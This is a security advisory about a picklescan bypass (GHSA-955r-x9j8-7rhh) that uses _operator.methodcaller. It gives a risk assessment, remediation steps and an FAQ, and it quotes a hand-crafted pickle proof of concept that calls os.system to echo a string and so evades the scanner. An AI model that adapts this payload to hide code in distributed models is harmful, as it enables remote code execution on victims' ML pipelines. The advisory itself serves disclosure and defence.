Picklescan, the de facto ML model security scanner for PyTorch, can be bypassed using a crafted pickle payload leveraging _operator.methodcaller — meaning any model scan returning 'clean' is untrustworthy until you upgrade to v0.0.34. If your MLOps pipeline uses picklescan as a security gate before loading external models, assume that gate is currently defeated. Patch immediately and treat any externally-sourced model loaded in the past 90 days as suspect.
Risk Assessment
HIGH. The vulnerability specifically undermines a security control — not just a feature — creating false confidence in teams that implemented picklescan as their primary defense against malicious ML models. Exploitability is moderate: the attacker needs to understand pickle internals well enough to hand-craft the payload (no pickle.dumps shortcut), but a working PoC is publicly available. Exposure is high because picklescan is widely deployed in PyTorch/MLOps workflows precisely by teams that care about security, meaning the victims are organizations with model-loading pipelines that have already adopted scanning — the most security-conscious targets.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.34 | 0.0.34 |
Do you use picklescan? You're affected.
Severity & Risk
Recommended Action
1 step-
1) PATCH: Upgrade picklescan to >= 0.0.34 immediately — this is a one-line fix in requirements.txt or Pipfile. 2) VERIFY: Audit which pipelines use picklescan and confirm the patched version is deployed, not a cached older version in a Docker layer. 3) DEFENSE-IN-DEPTH: Migrate model serialization to SafeTensors format (Hugging Face) which does not use pickle — this eliminates the attack surface class entirely. 4) SANDBOX: Run all pickle.load() calls inside isolated containers or VMs with no network egress and minimal filesystem access; treat model loading as untrusted code execution. 5) DETECT: Add egress monitoring on training/inference hosts for unexpected outbound connections during model loading. 6) POLICY: Enforce model provenance controls — only load models from cryptographically signed, internally-approved sources; block direct downloads from public hubs into production.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-955r-x9j8-7rhh?
Picklescan, the de facto ML model security scanner for PyTorch, can be bypassed using a crafted pickle payload leveraging _operator.methodcaller — meaning any model scan returning 'clean' is untrustworthy until you upgrade to v0.0.34. If your MLOps pipeline uses picklescan as a security gate before loading external models, assume that gate is currently defeated. Patch immediately and treat any externally-sourced model loaded in the past 90 days as suspect.
Is GHSA-955r-x9j8-7rhh actively exploited?
No confirmed active exploitation of GHSA-955r-x9j8-7rhh has been reported, but organizations should still patch proactively.
How to fix GHSA-955r-x9j8-7rhh?
1) PATCH: Upgrade picklescan to >= 0.0.34 immediately — this is a one-line fix in requirements.txt or Pipfile. 2) VERIFY: Audit which pipelines use picklescan and confirm the patched version is deployed, not a cached older version in a Docker layer. 3) DEFENSE-IN-DEPTH: Migrate model serialization to SafeTensors format (Hugging Face) which does not use pickle — this eliminates the attack surface class entirely. 4) SANDBOX: Run all pickle.load() calls inside isolated containers or VMs with no network egress and minimal filesystem access; treat model loading as untrusted code execution. 5) DETECT: Add egress monitoring on training/inference hosts for unexpected outbound connections during model loading. 6) POLICY: Enforce model provenance controls — only load models from cryptographically signed, internally-approved sources; block direct downloads from public hubs into production.
What systems are affected by GHSA-955r-x9j8-7rhh?
This vulnerability affects the following AI/ML architecture patterns: Training pipelines, Model serving, MLOps pipelines, Model registries, CI/CD for ML.
What is the CVSS score for GHSA-955r-x9j8-7rhh?
No CVSS score has been assigned yet.
Technical Details
NVD Description
### Summary Picklescan uses _operator.methodcaller, which is a built-in python library function to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling to _operator.methodcaller function in reduce method - Then when after the victim after checks whether or not the pickle file is safe by using Picklescan library and the library doesn't dectect any dangerous functions, pickle.load() loads this malicious pickle file, thus lead to remote code execution. ### PoC ``` import pickle import pickletools opcode2 = b'''cbuiltins __import__ (Vos tRp0 0c_operator methodcaller (Vsystem Vecho "pwned by _operator.methodcaller" tR(g0 tR.''' pickletools.dis(opcode2) pickle.loads(opcode2) ``` This PoC can't be easily create by pickle.dumps, so it was manually built. ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Report by Pinji Chen (cpj24@mails.tsinghua.edu.cn) from NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).
Exploitation Scenario
An adversary targeting an ML team at a financial institution crafts a malicious PyTorch model containing the _operator.methodcaller payload — a reverse shell or credential harvester — embedded in the pickle bytecode. They publish it to a public model hub under a convincing model name (e.g., a fine-tuned LLM for finance). The target team's MLOps pipeline automatically pulls the model, runs picklescan (returns clean), and loads it into their inference server. On pickle.load(), the payload executes, establishing a reverse shell from the inference server — which has IAM roles, database credentials, and internal network access — to the attacker's C2. The entire attack chain is invisible to the security scanner the team trusted.
Weaknesses (CWE)
References
Timeline
Related Vulnerabilities
GHSA-vvpj-8cmc-gx39 10.0 picklescan: security flaw enables exploitation
Same package: picklescan GHSA-g38g-8gr9-h9xp 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan GHSA-7wx9-6375-f5wh 9.8 picklescan: Allowlist Bypass evades input filtering
Same package: picklescan CVE-2025-1945 9.8 picklescan: ZIP flag bypass enables RCE in PyTorch models
Same package: picklescan GHSA-hgrh-qx5j-jfwx 8.8 picklescan: Protection Bypass circumvents security controls
Same package: picklescan
AI Threat Alert